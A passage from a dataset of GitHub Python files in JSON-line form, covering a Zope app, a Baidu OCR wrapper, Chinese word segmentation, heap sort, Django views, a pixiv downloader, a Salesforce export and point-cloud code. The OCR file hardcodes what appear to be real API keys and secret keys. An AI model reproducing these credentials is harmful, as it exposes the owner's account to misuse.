\"cookies\",\n \"Zope Realm Basic-Auth\",\n \"No Challenge if Authenticated\")\n\n\ndef intid_factory():\n return AdHocIdReference(attribute='docid')\n\n\nclass Dokumente(grok.Container):\n pass\n\n\nclass AdHocApp(grok.Application, grok.Container):\n grok.implements(IAdHocApplication)\n\n grok.local_utility(AdHocAuthenticator,\n name=u\"principals\",\n provides=IAuthenticatorPlugin)\n\n grok.local_utility(PluggableAuthentication,\n IAuthentication,\n public=True,\n setup=setup_pau)\n\n grok.local_utility(intid_factory,\n IAdHocIdReference,\n public=True)\n\n def __init__(self):\n super(AdHocApp, self).__init__()\n self['dokumente'] = Dokumente()\n\n def getSiteManager(self):\n current = super(AdHocApp, self).getSiteManager()\n #import pdb; pdb.set_trace() \n #return adhocRegistry\n if adhocRegistry not in current.__bases__:\n adhocRegistry.__bases__ = tuple([x for x in adhocRegistry.__bases__ if x.__hash__() != zope.component.globalSiteManager.__hash__()])\n current.__bases__ = (adhocRegistry,) + current.__bases__ \n else:\n if current.__bases__.index(adhocRegistry) == 1:\n current.__bases__ = current.__bases__[::-1]\n return current\n\n\n@customize(origin=IDate)\ndef customize_size(field):\n field.valueLength = 'medium'\n\n\n#class UvcRadioFieldWidget(UvcRadioFieldWidget):\n# grok.adapts(ChoiceField, Interface, IAdHocLayer)\n\n\n#class UvcMultiChoiceFieldWidget(UvcMultiChoiceFieldWidget):\n# grok.adapts(ChoiceField, Interface, IAdHocLayer)\n","repo_name":"novareto/uvc.adhoc","sub_path":"src/uvc/adhoc/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10536683237","text":"def swap_case(test):\n test1 = \"\"\n for i in test:\n if i.islower():\n i = i.upper()\n test1 = test1 + i\n else:\n i = i.lower()\n test1 = test1 + i\n return test1\n\n \n \nif __name__ == '__main__':\n s = input()\n result = swap_case(s)\n print(result)\n","repo_name":"harshaldeokarutd/HackerRank_solutions","sub_path":"Swap Case.py","file_name":"Swap Case.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28631912426","text":"from aip import AipOcr\r\nimport cv2\r\ndef get_file_content(filePath):\r\n with open(filePath, 'rb') as fp:\r\n return fp.read()\r\n\r\nclass Ocr_module():\r\n def __init__(self,):\r\n APP_ID = \"22729886\"\r\n API_KEY = \"EDrxKsEyjZ6VZXPMc9yZrnlp\"\r\n SECRET_KEY = \"Ax5HgTPasDqpLocaMIFQEjGWI6bQWkdH\"\r\n # APP_ID = \"16889798\"\r\n # API_KEY = \"TTP9lDBpD4vvrxoaBWyq7wn1\"\r\n # SECRET_KEY = \"zNFwdQTdmIpa4YSnIA73GgFk1zjjbI5W\"\r\n self.client_for_ocr = AipOcr(APP_ID, API_KEY, SECRET_KEY)\r\n\r\n def get_ocr(self, image):\r\n image = cv2.cvtColor(image,cv2.COLOR_RGB2BGR)\r\n cv2.imwrite(\"ocr_work/ocr_photo.jpg\", image)\r\n \r\n # 读取图像\r\n image = get_file_content(\"ocr_work/ocr_photo.jpg\")\r\n options = {\"language_type\": \"CHN_ENG\", \"detect_direction\": \"true\", \"detect_language\": \"true\"}\r\n # 进行检测\r\n result_dict = self.client_for_ocr.basicAccurate(image, options)\r\n\r\n # 获得预测结果\r\n result_list = result_dict[\"words_result\"]\r\n orc_save_sentence = \"\"\r\n for item in result_list:\r\n for string in item:\r\n orc_save_sentence = orc_save_sentence + item[string]\r\n return 
","repo_name":"AGuangzzz/Help_blind_project","sub_path":"Ocr_work/ocr.py","file_name":"ocr.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"29862934369","text":"#-*-coding: utf-8-*-\r\n\r\nimport os\r\nimport jieba\r\nimport jieba.posseg as pseg\r\n\r\ncx_dict = set(['n','Ng','Vg','v','vd','vn'])\r\n\r\nabs_path = os.path.dirname(os.path.abspath(__file__))\r\nABSOLUTE_DICT_PATH = os.path.abspath(os.path.join(abs_path, './dict'))\r\nCUSTOM_DICT_PATH = os.path.join(ABSOLUTE_DICT_PATH, 'userdic.txt')\r\nEXTRA_STOPWORD_PATH = os.path.join(ABSOLUTE_DICT_PATH, 'stopword.txt')\r\nEXTRA_EMOTIONWORD_PATH = os.path.join(ABSOLUTE_DICT_PATH, 'emotionlist.txt')\r\nEXTRA_ONE_WORD_WHITE_LIST_PATH = os.path.join(ABSOLUTE_DICT_PATH, 'one_word_white_list.txt')\r\nEXTRA_BLACK_LIST_PATH = os.path.join(ABSOLUTE_DICT_PATH, 'black.txt')\r\n\r\ndef load_one_words():\r\n    one_words = [line.strip('\\r\\n') for line in file(EXTRA_EMOTIONWORD_PATH)]\r\n    return one_words\r\n\r\ndef load_black_words():\r\n    one_words = [line.strip('\\r\\n') for line in file(EXTRA_BLACK_LIST_PATH)]\r\n    return one_words\r\n\r\ndef load_stop_words():\r\n\tstop_words = [line.strip('\\r\\n').split(\" \")[0] for line in file(EXTRA_STOPWORD_PATH)]\r\n\treturn stop_words\r\n\r\nsingle_word_whitelist = set(load_one_words())\r\nblack_word = set(load_black_words())\r\nstop_words = set(load_stop_words())\r\n\r\njieba.load_userdict(CUSTOM_DICT_PATH)\r\n\r\ndef segment(string):\r\n\t\"\"\"string: utf-8\r\n\t\"\"\"\r\n\tfinal_words = []\r\n\twords = pseg.cut(string)\r\n\tfor word, flag in words:\r\n\t\tif flag in cx_dict and (len(word) > 1 or word in single_word_whitelist) and word not in black_word and word not in stop_words:\r\n\t\t\tfinal_words.append(word)\r\n\r\n\treturn final_words\r\n","repo_name":"jianjian0dandan/info_consume","sub_path":"user_portrait/user_portrait/info_consume/save_csv/cut_word.py","file_name":"cut_word.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
{"seq_id":"23543777363","text":"\ndef LEFT(i):\n    return 2*i+1\ndef RIGHT(i):\n    return 2*i+2\ndef max_heapify(A,i):\n    # Sink A[i] until the subtree rooted at i satisfies the max-heap property\n    l=LEFT(i)\n    r=RIGHT(i)\n    if l<= size and A[l]>A[i]:\n        largest=l\n    else:\n        largest=i\n    if r<=size and A[r]>A[largest]:\n        largest=r\n    if largest !=i:\n        A[i],A[largest]=A[largest],A[i]\n        max_heapify(A,largest)\nA=[16,4,10,14,7,9,3,2,8,1]\nsize=len(A)-1\nlength=len(A)-1\ndef build_max_heap(A):\n    # Heapify bottom-up; nodes past size//2 are leaves already\n    for i in range(size//2,-1,-1):\n        max_heapify(A,i)\nresult=build_max_heap(A)\nprint(A)\nfor i in range(length,0,-1):\n    # Move the current max to the end, shrink the heap, restore the heap property\n    A[0],A[i]=A[i],A[0]\n    size-=1\n    max_heapify(A,0)\nprint(A)\n\n\n","repo_name":"rihengzhu/Algorithm","sub_path":"heap_sort.py","file_name":"heap_sort.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"32348588523","text":"from django.urls import path\nfrom . 
import views\nfrom django.conf import settings\nfrom django.conf.urls import url\nfrom django.conf.urls.static import static\n\n\n\nurlpatterns = [\n path('ex/', views.homePage, name=\"homePage\"),\n path('', views.home, name=\"home\"),\n path('members/', views.members, name=\"members\"),\n path('profile//', views.profile, name=\"profile\"),\n\n path('create_tier//',views.createTier, name=\"create_tier\"),\n path('update_tier//',views.updateTier, name=\"update_tier\"),\n path('delete_tier//',views.deleteTier, name=\"delete_tier\"),\n\n path('add_game/',views.newGame, name=\"add_game\"),\n path('add_member/',views.newMember, name=\"add_member\"),\n path('delete_member//',views.deleteMember, name=\"delete_member\"),\n\n path('register/', views.registerPage, name = \"register\"),\n path('login/', views.loginPage, name = \"login\"),\n path('logout/', views.logoutUser, name = \"logout\"),\n\n path('hierarchy/', views.hierarchy, name=\"hierarchy\"),\n path('userprofile//', views.userprofile, name=\"userprofile\"),\n path('updateuser//', views.updateuser, name=\"updateuser\"),\n\n path('teamlist/', views.teamlist, name=\"teamlist\"),\n path('addteam/', views.addTeam, name=\"addteam\"),\n path('team//', views.team, name=\"team\"),\n\n path('addtournament/', views.addTournament, name=\"addtournament\"),\n path('tournament/', views.Tourn, name=\"tournament\"),\n path('addt/', views.AddT, name=\"addt\"),\n path('deletetournament/', views.DelTourn, name=\"deleteTourn\"),\n\n path('apply/', views.Apply, name='apply'),\n path('approve/', views.Approve, name='approve'),\n path('delete/', views.Delete, name='delete'),\n\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"neelraval13/VoltFraction","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74995981953","text":"from collections import deque\n\nfor _ in range(10):\n t = int(input())\n nums = deque(map(int, input().split()))\n\n minus = 1\n while True:\n if minus == 6:\n minus = 1\n\n tmp = nums.popleft()\n if tmp - minus > 0:\n nums.append(tmp - minus)\n else:\n nums.append(0)\n break\n\n minus += 1\n\n print(f\"#{t}\", end=\" \")\n nums = list(nums)\n print(*nums)\n","repo_name":"yunkh2005/SWEA","sub_path":"D3/1225.py","file_name":"1225.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74331965955","text":"from typing import Any\n\nfrom rabbitark.config import config\nfrom rabbitark.error import NotFound\nfrom rabbitark.rabbitark import RabbitArk\nfrom rabbitark.utils.default_class import DownloadInfo, Image\nfrom rabbitark.utils.request import Request\nfrom rabbitark.utils.utils import folder_name_checker, get_urls, split\n\n\nclass PixivRequester(Request):\n def __init__(self):\n super().__init__(\n headers={\n \"accept-encoding\": \"gzip, deflate, br\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36\",\n \"referer\": \"https://pixiv.net\",\n \"sec-fetch-mode\": \"cors\",\n \"sec-fetch-site\": \"same-origin\",\n },\n cookies=config.COOKIES,\n )\n\n # async def get_postkey(self):\n # r = await self.get(\"https://www.pixiv.net/\", \"text\")\n # return re.findall(r'.*pixiv.context.token = \"([a-z0-9]{32})\"?.*', r.body)[0]\n\n async def 
get_illust_info(self, illust_id):\n info = await self.get(\n f\"https://www.pixiv.net/ajax/illust/{illust_id}\",\n \"json\",\n )\n if info.status == 200:\n return info.body\n else:\n return\n\n async def get_illust_urls(self, illust_id):\n info = await self.get(\n f\"https://www.pixiv.net/ajax/illust/{illust_id}/pages\",\n \"json\",\n )\n return [page[\"urls\"][\"original\"] for page in info.body[\"body\"]]\n\n async def get_user_info(self, user_id):\n info = await self.get(\n f\"https://www.pixiv.net/ajax/user/{user_id}?full=1\", \"json\"\n )\n if info.status == 200:\n return info.body[\"body\"][\"name\"]\n else:\n return None\n\n async def get_user_all_illust(self, user_id):\n info = await self.get(\n f\"https://www.pixiv.net/ajax/user/{user_id}/profile/all\",\n \"json\",\n )\n return info.body[\"body\"][\"illusts\"].keys()\n\n async def user_images(self, user_id):\n user_all_illust = await self.get_user_all_illust(user_id)\n url_list = await get_urls(self.get_illust_urls, user_all_illust)\n return url_list\n\n async def checking_id(self, pixiv_id):\n illust = await self.get_illust_info(pixiv_id)\n if illust:\n return await self.single_images(pixiv_id)\n\n username = await self.get_user_info(pixiv_id)\n if username:\n return await self.user(pixiv_id)\n\n raise NotFound(pixiv_id)\n\n async def single_images(self, illust_id):\n info = await self.get_illust_info(illust_id)\n if not info:\n return\n urls = await self.get_illust_urls(illust_id)\n return DownloadInfo(\n [Image(url) for url in urls],\n folder_name_checker(info[\"body\"][\"title\"]),\n self.headers,\n )\n\n async def user(self, user_id):\n username = await self.get_user_info(user_id)\n if not username:\n return\n url_list = await self.user_images(user_id)\n return DownloadInfo(\n [Image(url) for url in url_list],\n folder_name_checker(username),\n self.headers,\n )\n\n\n@RabbitArk.register(\"pixiv\")\nclass Pixiv(PixivRequester):\n def __init__(self):\n super().__init__()\n\n async def extractor_download(self, downloadable: Any) -> DownloadInfo:\n if downloadable.isdigit():\n info = await self.checking_id(downloadable)\n else:\n if \"artwork\" in downloadable:\n info = await self.single_images(split(downloadable))\n elif \"user\" in downloadable:\n info = await self.user(split(downloadable))\n else:\n raise NotFound(downloadable)\n\n if not info:\n raise NotFound(downloadable)\n\n return info\n","repo_name":"Saebasol/rabbit-ark","sub_path":"rabbitark/extractor/pixiv.py","file_name":"pixiv.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"42062461034","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('judges', '0006_auto_20151221_1551'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='judge',\n options={'permissions': (('has_beta_api_access', 'Can access features during beta period.'),)},\n ),\n ]\n","repo_name":"brianwc/courtlistener","sub_path":"cl/judges/migrations/0007_auto_20151230_1709.py","file_name":"0007_auto_20151230_1709.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"25655365424","text":"from django.urls import path\nfrom . 
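`checking_id` in the pixiv record above tries an illust lookup first, falls back to a user lookup, and only then raises `NotFound`. A stripped-down, runnable sketch of that try-in-order pattern; the stub coroutines here are placeholders, not the rabbitark API:

```python
import asyncio

class NotFound(Exception):
    pass

# Stubs standing in for get_illust_info / get_user_info.
async def lookup_illust(pixiv_id):
    return {"illust": pixiv_id} if pixiv_id == "1" else None

async def lookup_user(pixiv_id):
    return {"user": pixiv_id} if pixiv_id == "2" else None

async def checking_id(pixiv_id):
    # Try each lookup in order; the first non-empty result wins.
    for lookup in (lookup_illust, lookup_user):
        result = await lookup(pixiv_id)
        if result:
            return result
    raise NotFound(pixiv_id)

print(asyncio.run(checking_id("2")))  # {'user': '2'}
```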
import views\n\nurlpatterns = [\n path('skill/',views.skill,name='skill'),\n path('education/',views.education,name='education'),\n path('project/',views.project,name='project'),\n path('experience/',views.experience,name='experience'),\n path('training/',views.training,name='training'),\n]\n","repo_name":"ayush4545/Django_MyResume","sub_path":"edu/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39341060661","text":"from rest_framework import viewsets, permissions\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import *\nfrom rest_framework.response import Response\n\nfrom common.exception_response import ExceptionResponse, ErrorCode\nfrom .serilaizers_schedule import *\nfrom .serializers_recruitment import *\nfrom circle.functions import *\nfrom circle.models import Circle\n\n# Create your views here.\n\n\nclass RecruitmentViewSet(viewsets.GenericViewSet):\n serializer_class = RecruitmentSerializer\n permission_classes = (permissions.AllowAny,) # 테스트용 임시\n\n def get_queryset(self):\n return Recruitment.objects.all()\n\n # GET circle/{id}/recruitment/\n def list(self, request, circle_id):\n\n error, circle = find_circle(circle_id)\n if error:\n return error\n\n queryset = self.get_queryset()\n queryset = queryset.filter(circle_id=circle_id)\n\n page = self.paginate_queryset(queryset)\n if page is not None:\n serializer = RecruitmentViewSerializer(\n page, many=True, context={\"request\": request}\n )\n return self.get_paginated_response(serializer.data)\n else:\n return ExceptionResponse(\n status=status.HTTP_400_BAD_REQUEST,\n detail=\"Page is None\",\n code=ErrorCode.PAGINATION_FAULT,\n ).to_response()\n\n # GET circle/{id}/recruitment/{default, id}/\n def retrieve(self, request, circle_id, pk):\n\n error, circle = find_circle(circle_id)\n if error:\n return error\n\n error, recruitment = find_recruitment(pk, circle)\n if error:\n return error\n\n return Response(\n status=status.HTTP_200_OK,\n data=RecruitmentViewSerializer(recruitment).data,\n )\n\n # POST circle/{id}/recruitment/\n def create(self, request, circle_id):\n\n recruitments = Recruitment.objects.filter(circle_id=circle_id)\n if len(recruitments) > 0:\n return ExceptionResponse(\n status=status.HTTP_409_CONFLICT,\n detail=\"동아리에 Recruitment가 이미 존재합니다.\",\n code=ErrorCode.CONFLICT,\n ).to_response()\n\n data = request.data.copy()\n data[\"circle\"] = circle_id\n\n serializer = self.get_serializer(data=data, context={\"request\": request})\n serializer.is_valid(raise_exception=True)\n recruitment = serializer.save()\n\n return Response(\n status=status.HTTP_201_CREATED,\n data=RecruitmentViewSerializer(recruitment).data,\n )\n\n # PUT circle/{id}/recruitment/{default, id}\n def update(self, request, circle_id, pk):\n\n error, circle = find_circle(circle_id)\n if error:\n return error\n\n error, recruitment = find_recruitment(pk, circle)\n if error:\n return error\n\n serializer = RecruitmentUpdateSerializer(recruitment, data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.update(recruitment, serializer.validated_data)\n\n return Response(\n status=status.HTTP_200_OK, data=RecruitmentViewSerializer(recruitment).data\n )\n\n # DELETE circle/{id}/recruitment/{default, id}\n def destroy(self, request, circle_id, pk):\n error, circle = find_circle(circle_id)\n if error:\n return error\n\n error, recruitment = 
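The recruitment views beginning above lean on helpers such as `find_circle` that return an `(error_response, object)` pair. Those helpers live in `circle.functions`, which is not included in this dump; a guess at the contract (only the names and the tuple shape come from the record, the body is an assumption):

```python
# Hypothetical sketch of the (error, object) helper contract; Circle, status,
# ExceptionResponse, and ErrorCode are the project's own names and are not
# defined here, so this documents the shape rather than a runnable module.
def find_circle(circle_id):
    try:
        circle = Circle.objects.get(id=circle_id)
    except Circle.DoesNotExist:
        error = ExceptionResponse(
            status=status.HTTP_404_NOT_FOUND,
            detail=f"circle {circle_id} not found",
            code=ErrorCode.CIRCLE_NOT_FOUND,
        ).to_response()
        return error, None
    return None, circle
```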
find_recruitment(pk, circle)\n if error:\n return error\n\n recruitment.delete()\n\n return Response(\n status=status.HTTP_200_OK, data={\"detail\": \"deleted successfully\"}\n )\n\n\nclass RecruitmentScheduleViewSet(viewsets.GenericViewSet):\n serializer_class = RecruitScheduleSerializer\n permission_classes = (permissions.AllowAny,) # 테스트용 임시\n\n # GET circle/{id}/recruitment/{id}/schedule/\n def list(self, request, circle_id, recruitment_id):\n\n error, circle = find_circle(circle_id)\n if error:\n return error\n\n error, recruitment = find_recruitment(recruitment_id, circle)\n if error:\n return error\n\n queryset = self.get_queryset().filter(recruitment=recruitment)\n page = self.paginate_queryset(queryset)\n\n if page is not None:\n serializer = RecruitScheduleViewSerializer(\n page, many=True, context={\"request\": request}\n )\n return self.get_paginated_response(serializer.data)\n else:\n return ExceptionResponse(\n status=status.HTTP_400_BAD_REQUEST,\n detail=\"Page is None\",\n code=ErrorCode.PAGINATION_FAULT,\n ).to_response()\n\n def get_queryset(self):\n return RecruitmentSchedule.objects.all()\n\n # POST circle/{id}/recruitment/\n def create(self, request, circle_id, recruitment_id):\n\n error, circle = find_circle(circle_id)\n if error:\n return error\n\n error, recruitment = find_recruitment(recruitment_id, circle)\n if error:\n return error\n\n data = request.data.copy()\n data[\"recruitment\"] = recruitment.id\n\n serializer = self.get_serializer(data=data, context={\"request\": request})\n serializer.is_valid(raise_exception=True)\n recruitment_schedule = serializer.save()\n\n return Response(\n status=status.HTTP_201_CREATED,\n data=RecruitScheduleViewSerializer(recruitment_schedule).data,\n )\n\n # PUT circle/{id}/recruitment/{id}/schedule/{id}\n def update(self, request, circle_id, recruitment_id, pk):\n\n error, circle = find_circle(circle_id)\n if error:\n return error\n\n error, recruitment = find_recruitment(recruitment_id, circle)\n if error:\n return error\n\n error, recruitment_schedule = find_recruitment_schedule(pk, recruitment)\n if error:\n return error\n\n serializer = RecruitScheduleUpdateSerializer(\n recruitment_schedule, data=request.data\n )\n serializer.is_valid(raise_exception=True)\n serializer.update(recruitment_schedule, serializer.validated_data)\n\n return Response(\n status=status.HTTP_201_CREATED,\n data=RecruitScheduleViewSerializer(recruitment_schedule).data,\n )\n\n # DELETE circle/{id}/recruitment/{default, id}\n def destroy(self, request, circle_id, recruitment_id, pk):\n\n error, circle = find_circle(circle_id)\n if error:\n return error\n\n error, recruitment = find_recruitment(pk, circle)\n if error:\n return error\n\n error, recruitment_schedule = find_recruitment_schedule(pk, recruitment)\n if error:\n return error\n\n recruitment_schedule.schedule.delete()\n\n return Response(\n status=status.HTTP_200_OK, data={\"detail\": \"deleted successfully\"}\n )\n\n\n@api_view((\"GET\",))\n@permission_classes((AllowAny,))\ndef get_recruitment_list_by_circle_name(request, circle_name):\n if not Circle.objects.filter(name=circle_name).exists():\n return ExceptionResponse(\n status=status.HTTP_404_NOT_FOUND,\n detail=\"name: \" + circle_name + \"에 해당하는 동아리가 존재하지 않습니다.\",\n code=ErrorCode.CIRCLE_NOT_FOUND,\n ).to_response()\n circle = Circle.objects.get(name=circle_name)\n recruitment = Recruitment.objects.filter(circle=circle.id)\n return Response(RecruitmentSerializer(recruitment, 
many=True).data)\n","repo_name":"wafflestudio/sharkle-server","sub_path":"sharkle/recruitment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7619,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"37839222836","text":"import json\n\nimport click\nfrom fetch_charitybase import get_charity_numbers, get_charitybase_data, get_iso_lookup\nfrom fetch_salesforce import fetch_data, get_salesforce_instance\nfrom fetch_styles import fetch_header_and_footer\nfrom sdgs import SDG_NAMES, clean_sdgs\nfrom settings import FINAL_OUTPUT\nfrom utils import clean_object\n\n\n@click.command()\n@click.option(\"--output\", default=FINAL_OUTPUT, show_default=True)\ndef main(output):\n click.echo(\"Fetching data from salesforce\")\n sf = get_salesforce_instance()\n members = dict(fetch_data(sf))\n click.echo(f\"Fetched {len(members):,.0f} records from salesforce\")\n\n click.echo(\"Clean SDG data\")\n members = dict(clean_sdgs(members))\n click.echo(\"Get Charity Commission key -> ISO country code lookups\")\n iso_lookup = get_iso_lookup()\n click.echo(\"Extract charity numbers to fetch\")\n charity_numbers = get_charity_numbers(members)\n click.echo(\n f\"Fetching data on {len(charity_numbers):,.0f} charities from CharityBase\"\n )\n charity_data = get_charitybase_data(charity_numbers, iso_lookup)\n click.echo(f\"Fetched data on {len(charity_data):,.0f} charities from CharityBase\")\n\n click.echo(\"Add charity data to member data\")\n members_for_site = {}\n for k, m in members.items():\n if m[\"Remove_from_member_directory__c\"]:\n continue\n charity = charity_data.get(\n m[\"Charity_Commission_number__c\"],\n {\n \"logourl\": None,\n \"activities\": m.get(\"Description\"),\n \"countries\": [],\n },\n )\n if \"Description\" in m:\n del m[\"Description\"]\n members_for_site[k] = {**charity, **clean_object(m)}\n\n click.echo(\"Write data to output file\")\n with open(output, \"w\", encoding=\"utf8\") as a:\n json.dump(\n {\n \"members\": members_for_site,\n \"sdgs\": dict(zip(SDG_NAMES.values(), SDG_NAMES.keys())),\n },\n a,\n indent=4,\n )\n click.echo(f\"Data written to `{output}`\")\n\n click.echo(\"Fetch header and footer\")\n fetch_header_and_footer()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"bond-member-directory/bond-membership","sub_path":"fetch-data/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32507933299","text":"import scipy.io as scio\r\nimport numpy as np\r\nimport os\r\nimport math\r\n# from stl import mesh # numpy-stl\r\nimport open3d\r\nfrom sklearn.mixture import GaussianMixture\r\nfrom sklearn.metrics import davies_bouldin_score\r\n\r\n\r\ndef mkdir(path):\r\n '''\r\n 判断是否存在文件夹, 如果不存在则创建为文件夹\r\n :param path:文件夹路径\r\n :return:\r\n '''\r\n folder = os.path.exists(path)\r\n if not folder:\r\n os.makedirs(path)\r\n\r\n\r\ndef PtSegmentation(path, type, save_dir, save_name=None):\r\n if type is 'mat':\r\n data = scio.loadmat(path)\r\n pts = data['points']\r\n else:\r\n print('wrong input \\\"type\\\"!')\r\n os._exit(0)\r\n return\r\n\r\n if save_name is None:\r\n save_name = os.path.basename(path)[:-4]\r\n\r\n z = pts[:, 2].reshape(-1, 1)\r\n gmm_2 = GaussianMixture(n_components=2).fit(z)\r\n labels_2 = gmm_2.predict(z)\r\n\r\n if davies_bouldin_score(z, labels_2) < 0.4:\r\n if gmm_2.means_[0] > gmm_2.means_[1]:\r\n pts = pts[labels_2 == 0]\r\n else:\r\n pts 
= pts[labels_2 == 1]\r\n\r\n mkdir(save_dir)\r\n file = open(save_dir + save_name + '.txt', 'w')\r\n file.close()\r\n\r\n mkdir(save_dir)\r\n scio.savemat(save_dir + save_name + '.mat', {'points': pts})\r\n\r\n\r\ndef ComputePt(centralized_verts, r):\r\n '''\r\n :param centralized_verts: 中心化的点云数据(Nx3)\r\n :param r: 以某点附近半径r的球形域内部点作为平面微元\r\n :return:\r\n '''\r\n # 初始化法向量、表面深度存储\r\n normal_vec = np.nan * np.ones((centralized_verts.shape[0], 3))\r\n surface_depth = np.nan * np.ones(centralized_verts.shape[0])\r\n\r\n verts_len = centralized_verts.shape[0]\r\n\r\n mean = np.mean\r\n svd = np.linalg.svd\r\n argmin = np.argmin\r\n\r\n pcd = open3d.geometry.PointCloud()\r\n pcd.points = open3d.utility.Vector3dVector(centralized_verts)\r\n pcd_tree = open3d.geometry.KDTreeFlann(pcd)\r\n\r\n for i in range(verts_len):\r\n\r\n # 将所有与选定点距离小于r的点构成平面\r\n point = centralized_verts[i, :]\r\n\r\n [_, idx, _] = pcd_tree.search_radius_vector_3d(pcd.points[i], r)\r\n\r\n Plane = centralized_verts[idx, :]\r\n\r\n # 微元平面中心化\r\n plane_center = np.array([mean(Plane[:, 0]), mean(Plane[:, 1]), mean(Plane[:, 2])])\r\n centerPlane = Plane - plane_center\r\n\r\n # SVD分解找到法向量\r\n [_, S, VT] = svd(centerPlane)\r\n V = VT.T\r\n\r\n # 如果周围点不足,此点作废\r\n if S.shape[0] < 3:\r\n continue\r\n\r\n # 法向量为投影强度最小对应的特征向量\r\n plane_nv = np.ascontiguousarray(V[:, argmin(np.array([S[0], S[1], S[2]]))]) # 局部平面法向量\r\n\r\n # 校正法向量方向,从点云中心指向局部平面\r\n if plane_center.dot(plane_nv) < 0:\r\n plane_nv = -plane_nv\r\n\r\n # 保存法向量\r\n normal_vec[i, :] = plane_nv\r\n\r\n # 表面深度\r\n surface_depth[i] = np.vdot(point - plane_center, plane_nv)\r\n\r\n # print('\\n')\r\n return normal_vec, surface_depth\r\n\r\n\r\ndef ComputePtData(path, type='stl', r=0.15, save_dir=None, save_name=None, rotate=None):\r\n '''\r\n 计算点云中每个点的法向量和表面深度\r\n :param path: 文件路径\r\n :param r: 以某点附近半径r的球形域内部点作为平面微元\r\n :param save_dir: 数据保存路径\r\n :param save_name: 数据保存名称,默认为读入的名称\r\n :return: 点云(Nx3), 法向量(Nx3), 归一化后的表面深度(Nx3)\r\n '''\r\n if type is 'mat':\r\n data = scio.loadmat(path)\r\n points = data['points']\r\n else:\r\n print('error input \\\"type\\\"!')\r\n os._exit(0)\r\n return\r\n\r\n if save_name is None:\r\n save_name = os.path.basename(path)[:-4]\r\n\r\n if rotate is not None:\r\n R = Ang2Matrix(rotate[0], rotate[1], rotate[2], type='ang')\r\n points = np.dot(points, R.T)\r\n\r\n verts_center = np.mean(points, 0) # 点云中心\r\n\r\n # 中心化\r\n points -= verts_center\r\n\r\n # normals, depth = JitComputePt(points, r)\r\n normals, depth = ComputePt(points, r)\r\n\r\n # 排除孤立点\r\n points = points[~np.isnan(depth), :]\r\n normals = normals[~np.isnan(depth), :]\r\n # stl_normals = stl_normals[~np.isnan(depth), :]\r\n depth = depth[~np.isnan(depth)].reshape(-1, 1)\r\n\r\n if save_dir is not None:\r\n mkdir(save_dir)\r\n scio.savemat(save_dir + save_name + '.mat',\r\n {'points': points, 'normals': normals, 'depth': depth})\r\n\r\n\r\ndef Ang2Matrix(pitch, yaw, roll, type):\r\n '''\r\n 从角度转换为旋转矩阵,弧度制\r\n :param pitch:绕X轴旋转\r\n :param yaw:绕Y轴旋转\r\n :param roll:绕Z轴旋转\r\n :param type:'ang'角度制,'rad'弧度制\r\n :return:旋转矩阵R\r\n '''\r\n if type is 'ang':\r\n pitch, yaw, roll = math.radians(pitch), math.radians(yaw), math.radians(roll)\r\n elif type is not 'rad':\r\n print('wrong input in Ang2Matrix \\\"measure\\\"!')\r\n os._exit(0)\r\n\r\n Rx = np.array([[1, 0, 0],\r\n [0, np.cos(pitch), - np.sin(pitch)],\r\n [0, np.sin(pitch), np.cos(pitch)]])\r\n Ry = np.array([[np.cos(yaw), 0, np.sin(yaw)],\r\n [0, 1, 0],\r\n [-np.sin(yaw), 0, np.cos(yaw)]])\r\n Rz = np.array([[np.cos(roll), 
